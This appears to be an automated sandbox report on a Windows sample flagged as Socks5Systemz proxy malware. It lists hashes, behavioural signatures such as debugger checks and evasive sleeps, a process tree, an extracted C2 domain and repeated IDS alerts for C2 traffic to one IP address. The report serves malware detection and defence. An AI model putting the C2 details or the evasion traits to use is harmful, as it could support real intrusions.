Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6hvZpn91O8.exe

Overview

General Information

Sample name:6hvZpn91O8.exe
renamed because original name is a hash value
Original sample name:1015b0b5cfddfbc4baea6910d9c56c3c.exe
Analysis ID:1575009
MD5:1015b0b5cfddfbc4baea6910d9c56c3c
SHA1:9fe1cae9d38a53a1217556c60ffd3c02d8235d66
SHA256:f08f680f17aaf9505a8d53648545ce684af9b39a90a8dc9d2e872693e1d59b45
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

Petite Virus, Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Petite Virus
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
PE file has nameless sections
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 6hvZpn91O8.exe (PID: 6816 cmdline: "C:\Users\user\Desktop\6hvZpn91O8.exe" MD5: 1015B0B5CFDDFBC4BAEA6910D9C56C3C)
    • 6hvZpn91O8.tmp (PID: 3732 cmdline: "C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp" /SL5="$10432,6991381,54272,C:\Users\user\Desktop\6hvZpn91O8.exe" MD5: F448D7F4B76E5C9C3A4EAFF16A8B9B73)
      • schtasks.exe (PID: 4408 cmdline: "C:\Windows\system32\schtasks.exe" /Query MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crtgame.exe (PID: 3616 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
      • net.exe (PID: 4136 cmdline: "C:\Windows\system32\net.exe" helpmsg 10 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 5740 cmdline: C:\Windows\system32\net1 helpmsg 10 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • crtgame.exe (PID: 2496 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
  • cleanup
{"C2 list": ["bwiesit.com"]}
SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
    C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
      C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
        C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
          C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
              00000006.00000002.2939732261.0000000002B7F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                Process Memory Space: crtgame.exe PID: 2496JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T03:07:57.978929+010020494671A Network Trojan was detected192.168.2.44973694.232.249.18780TCP
                  2024-12-14T03:07:58.608004+010020494671A Network Trojan was detected192.168.2.44973694.232.249.18780TCP
                  2024-12-14T03:08:00.205019+010020494671A Network Trojan was detected192.168.2.44973794.232.249.18780TCP
                  2024-12-14T03:08:01.785416+010020494671A Network Trojan was detected192.168.2.44974094.232.249.18780TCP
                  2024-12-14T03:08:03.392194+010020494671A Network Trojan was detected192.168.2.44974194.232.249.18780TCP
                  2024-12-14T03:08:05.001033+010020494671A Network Trojan was detected192.168.2.44974794.232.249.18780TCP
                  2024-12-14T03:08:06.577197+010020494671A Network Trojan was detected192.168.2.44975394.232.249.18780TCP
                  2024-12-14T03:08:08.166473+010020494671A Network Trojan was detected192.168.2.44975994.232.249.18780TCP
                  2024-12-14T03:08:08.772181+010020494671A Network Trojan was detected192.168.2.44975994.232.249.18780TCP
                  2024-12-14T03:08:09.377875+010020494671A Network Trojan was detected192.168.2.44975994.232.249.18780TCP
                  2024-12-14T03:08:10.951577+010020494671A Network Trojan was detected192.168.2.44976594.232.249.18780TCP
                  2024-12-14T03:08:12.526162+010020494671A Network Trojan was detected192.168.2.44977194.232.249.18780TCP
                  2024-12-14T03:08:13.123974+010020494671A Network Trojan was detected192.168.2.44977194.232.249.18780TCP
                  2024-12-14T03:08:14.702136+010020494671A Network Trojan was detected192.168.2.44977794.232.249.18780TCP
                  2024-12-14T03:08:16.282067+010020494671A Network Trojan was detected192.168.2.44977894.232.249.18780TCP
                  2024-12-14T03:08:17.856916+010020494671A Network Trojan was detected192.168.2.44978494.232.249.18780TCP
                  2024-12-14T03:08:19.440462+010020494671A Network Trojan was detected192.168.2.44979094.232.249.18780TCP
                  2024-12-14T03:08:21.022814+010020494671A Network Trojan was detected192.168.2.44979294.232.249.18780TCP
                  2024-12-14T03:08:21.623810+010020494671A Network Trojan was detected192.168.2.44979294.232.249.18780TCP
                  2024-12-14T03:08:23.212063+010020494671A Network Trojan was detected192.168.2.44979894.232.249.18780TCP
                  2024-12-14T03:08:23.811479+010020494671A Network Trojan was detected192.168.2.44979894.232.249.18780TCP
                  2024-12-14T03:08:25.393608+010020494671A Network Trojan was detected192.168.2.44980494.232.249.18780TCP
                  2024-12-14T03:08:26.999223+010020494671A Network Trojan was detected192.168.2.44980994.232.249.18780TCP
                  2024-12-14T03:08:28.580571+010020494671A Network Trojan was detected192.168.2.44981494.232.249.18780TCP
                  2024-12-14T03:08:30.164823+010020494671A Network Trojan was detected192.168.2.44981994.232.249.18780TCP
                  2024-12-14T03:08:30.770392+010020494671A Network Trojan was detected192.168.2.44981994.232.249.18780TCP
                  2024-12-14T03:08:32.348769+010020494671A Network Trojan was detected192.168.2.44982594.232.249.18780TCP
                  2024-12-14T03:08:33.923562+010020494671A Network Trojan was detected192.168.2.44982894.232.249.18780TCP
                  2024-12-14T03:08:35.504852+010020494671A Network Trojan was detected192.168.2.44983494.232.249.18780TCP
                  2024-12-14T03:08:37.096939+010020494671A Network Trojan was detected192.168.2.44983994.232.249.18780TCP
                  2024-12-14T03:08:38.687703+010020494671A Network Trojan was detected192.168.2.44984494.232.249.18780TCP
                  2024-12-14T03:08:40.308518+010020494671A Network Trojan was detected192.168.2.44984794.232.249.18780TCP
                  2024-12-14T03:08:41.915277+010020494671A Network Trojan was detected192.168.2.44985294.232.249.18780TCP
                  2024-12-14T03:08:43.485288+010020494671A Network Trojan was detected192.168.2.44985894.232.249.18780TCP
                  2024-12-14T03:08:45.064366+010020494671A Network Trojan was detected192.168.2.44986194.232.249.18780TCP
                  2024-12-14T03:08:46.673589+010020494671A Network Trojan was detected192.168.2.44986594.232.249.18780TCP
                  2024-12-14T03:08:48.257697+010020494671A Network Trojan was detected192.168.2.44987094.232.249.18780TCP
                  2024-12-14T03:08:48.858160+010020494671A Network Trojan was detected192.168.2.44987094.232.249.18780TCP
                  2024-12-14T03:08:50.475692+010020494671A Network Trojan was detected192.168.2.44987694.232.249.18780TCP
                  2024-12-14T03:08:51.087120+010020494671A Network Trojan was detected192.168.2.44987694.232.249.18780TCP
                  2024-12-14T03:08:51.699334+010020494671A Network Trojan was detected192.168.2.44987694.232.249.18780TCP
                  2024-12-14T03:08:53.287005+010020494671A Network Trojan was detected192.168.2.44988394.232.249.18780TCP
                  2024-12-14T03:08:54.907769+010020494671A Network Trojan was detected192.168.2.44988794.232.249.18780TCP
                  2024-12-14T03:08:56.492651+010020494671A Network Trojan was detected192.168.2.44989394.232.249.18780TCP
                  2024-12-14T03:08:58.069074+010020494671A Network Trojan was detected192.168.2.44989594.232.249.18780TCP
                  2024-12-14T03:08:59.653727+010020494671A Network Trojan was detected192.168.2.44989994.232.249.18780TCP
                  2024-12-14T03:09:01.288045+010020494671A Network Trojan was detected192.168.2.44990594.232.249.18780TCP
                  2024-12-14T03:09:02.868923+010020494671A Network Trojan was detected192.168.2.44990994.232.249.18780TCP
                  2024-12-14T03:09:04.512597+010020494671A Network Trojan was detected192.168.2.44991394.232.249.18780TCP
                  2024-12-14T03:09:09.445534+010020494671A Network Trojan was detected192.168.2.44992394.232.249.18780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T03:07:57.978929+010020494681A Network Trojan was detected192.168.2.44973694.232.249.18780TCP
                  2024-12-14T03:07:58.608004+010020494681A Network Trojan was detected192.168.2.44973694.232.249.18780TCP
                  2024-12-14T03:08:00.205019+010020494681A Network Trojan was detected192.168.2.44973794.232.249.18780TCP
                  2024-12-14T03:08:01.785416+010020494681A Network Trojan was detected192.168.2.44974094.232.249.18780TCP
                  2024-12-14T03:08:03.392194+010020494681A Network Trojan was detected192.168.2.44974194.232.249.18780TCP
                  2024-12-14T03:08:05.001033+010020494681A Network Trojan was detected192.168.2.44974794.232.249.18780TCP
                  2024-12-14T03:08:06.577197+010020494681A Network Trojan was detected192.168.2.44975394.232.249.18780TCP
                  2024-12-14T03:08:08.166473+010020494681A Network Trojan was detected192.168.2.44975994.232.249.18780TCP
                  2024-12-14T03:08:08.772181+010020494681A Network Trojan was detected192.168.2.44975994.232.249.18780TCP
                  2024-12-14T03:08:09.377875+010020494681A Network Trojan was detected192.168.2.44975994.232.249.18780TCP
                  2024-12-14T03:08:10.951577+010020494681A Network Trojan was detected192.168.2.44976594.232.249.18780TCP
                  2024-12-14T03:08:12.526162+010020494681A Network Trojan was detected192.168.2.44977194.232.249.18780TCP
                  2024-12-14T03:08:13.123974+010020494681A Network Trojan was detected192.168.2.44977194.232.249.18780TCP
                  2024-12-14T03:08:14.702136+010020494681A Network Trojan was detected192.168.2.44977794.232.249.18780TCP
                  2024-12-14T03:08:16.282067+010020494681A Network Trojan was detected192.168.2.44977894.232.249.18780TCP
                  2024-12-14T03:08:17.856916+010020494681A Network Trojan was detected192.168.2.44978494.232.249.18780TCP
                  2024-12-14T03:08:19.440462+010020494681A Network Trojan was detected192.168.2.44979094.232.249.18780TCP
                  2024-12-14T03:08:21.022814+010020494681A Network Trojan was detected192.168.2.44979294.232.249.18780TCP
                  2024-12-14T03:08:21.623810+010020494681A Network Trojan was detected192.168.2.44979294.232.249.18780TCP
                  2024-12-14T03:08:23.212063+010020494681A Network Trojan was detected192.168.2.44979894.232.249.18780TCP
                  2024-12-14T03:08:23.811479+010020494681A Network Trojan was detected192.168.2.44979894.232.249.18780TCP
                  2024-12-14T03:08:25.393608+010020494681A Network Trojan was detected192.168.2.44980494.232.249.18780TCP
                  2024-12-14T03:08:26.999223+010020494681A Network Trojan was detected192.168.2.44980994.232.249.18780TCP
                  2024-12-14T03:08:28.580571+010020494681A Network Trojan was detected192.168.2.44981494.232.249.18780TCP
                  2024-12-14T03:08:30.164823+010020494681A Network Trojan was detected192.168.2.44981994.232.249.18780TCP
                  2024-12-14T03:08:30.770392+010020494681A Network Trojan was detected192.168.2.44981994.232.249.18780TCP
                  2024-12-14T03:08:32.348769+010020494681A Network Trojan was detected192.168.2.44982594.232.249.18780TCP
                  2024-12-14T03:08:33.923562+010020494681A Network Trojan was detected192.168.2.44982894.232.249.18780TCP
                  2024-12-14T03:08:35.504852+010020494681A Network Trojan was detected192.168.2.44983494.232.249.18780TCP
                  2024-12-14T03:08:37.096939+010020494681A Network Trojan was detected192.168.2.44983994.232.249.18780TCP
                  2024-12-14T03:08:38.687703+010020494681A Network Trojan was detected192.168.2.44984494.232.249.18780TCP
                  2024-12-14T03:08:40.308518+010020494681A Network Trojan was detected192.168.2.44984794.232.249.18780TCP
                  2024-12-14T03:08:41.915277+010020494681A Network Trojan was detected192.168.2.44985294.232.249.18780TCP
                  2024-12-14T03:08:43.485288+010020494681A Network Trojan was detected192.168.2.44985894.232.249.18780TCP
                  2024-12-14T03:08:45.064366+010020494681A Network Trojan was detected192.168.2.44986194.232.249.18780TCP
                  2024-12-14T03:08:46.673589+010020494681A Network Trojan was detected192.168.2.44986594.232.249.18780TCP
                  2024-12-14T03:08:48.257697+010020494681A Network Trojan was detected192.168.2.44987094.232.249.18780TCP
                  2024-12-14T03:08:48.858160+010020494681A Network Trojan was detected192.168.2.44987094.232.249.18780TCP
                  2024-12-14T03:08:50.475692+010020494681A Network Trojan was detected192.168.2.44987694.232.249.18780TCP
                  2024-12-14T03:08:51.087120+010020494681A Network Trojan was detected192.168.2.44987694.232.249.18780TCP
                  2024-12-14T03:08:51.699334+010020494681A Network Trojan was detected192.168.2.44987694.232.249.18780TCP
                  2024-12-14T03:08:53.287005+010020494681A Network Trojan was detected192.168.2.44988394.232.249.18780TCP
                  2024-12-14T03:08:54.907769+010020494681A Network Trojan was detected192.168.2.44988794.232.249.18780TCP
                  2024-12-14T03:08:56.492651+010020494681A Network Trojan was detected192.168.2.44989394.232.249.18780TCP
                  2024-12-14T03:08:58.069074+010020494681A Network Trojan was detected192.168.2.44989594.232.249.18780TCP
                  2024-12-14T03:08:59.653727+010020494681A Network Trojan was detected192.168.2.44989994.232.249.18780TCP
                  2024-12-14T03:09:01.288045+010020494681A Network Trojan was detected192.168.2.44990594.232.249.18780TCP
                  2024-12-14T03:09:02.868923+010020494681A Network Trojan was detected192.168.2.44990994.232.249.18780TCP
                  2024-12-14T03:09:04.512597+010020494681A Network Trojan was detected192.168.2.44991394.232.249.18780TCP
                  2024-12-14T03:09:09.445534+010020494681A Network Trojan was detected192.168.2.44992394.232.249.18780TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 6hvZpn91O8.exeAvira: detected
                  Source: crtgame.exe.2496.6.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["bwiesit.com"]}
                  Source: 6hvZpn91O8.exeVirustotal: Detection: 57%Perma Link
                  Source: 6hvZpn91O8.exeReversingLabs: Detection: 39%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0045C8A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045C8A8
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0045C95C ArcFourCrypt,1_2_0045C95C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0045C974 ArcFourCrypt,1_2_0045C974
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                  Compliance

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 4.2.crtgame.exe.400000.0.unpack
                  Source: 6hvZpn91O8.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-BJBAO.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-HAM7K.tmp.1.dr
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49759 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49759 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49736 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49736 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49778 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49778 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49741 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49798 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49741 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49765 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49765 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49747 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49753 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49753 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49814 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49814 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49747 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49798 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49819 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49819 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49804 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49771 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49804 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49809 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49771 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49809 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49790 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49784 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49784 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49777 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49858 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49858 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49883 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49852 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49870 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49740 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49740 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49852 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49737 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49899 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49737 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49847 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49828 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49847 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49777 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49883 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49913 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49913 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49790 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49828 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49893 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49893 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49844 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49870 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49899 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49825 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49825 -> 94.232.249.187:80
